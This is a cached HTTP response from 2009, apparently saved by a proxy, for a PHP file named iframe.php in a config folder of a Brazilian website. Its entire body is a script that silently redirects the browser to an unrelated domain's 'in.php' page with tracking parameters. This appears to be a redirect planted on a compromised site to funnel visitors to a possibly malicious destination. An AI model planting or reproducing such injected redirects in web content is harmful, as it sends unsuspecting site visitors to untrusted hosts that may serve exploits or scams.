HTTP/1.1 200 OK
Content-Length: 115
Date: Wed, 25 Feb 2009 09:19:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.5
Set-Cookie: vis=y; expires=Thu, 26-Feb-2009 09:20:00 GMT
Content-Type: text/html
X-Polipo-Location: http://maisonjj.com.br/agenda/cad/config/iframe.php
X-Polipo-Date: Wed, 25 Feb 2009 09:30:25 GMT
X-Polipo-Access: Thu, 05 Mar 2009 07:09:08 GMT

<script language="JavaScript"> window.location.href = "http://vipasotka.com/in.php?adv=5017&val=73c7e74d" </script>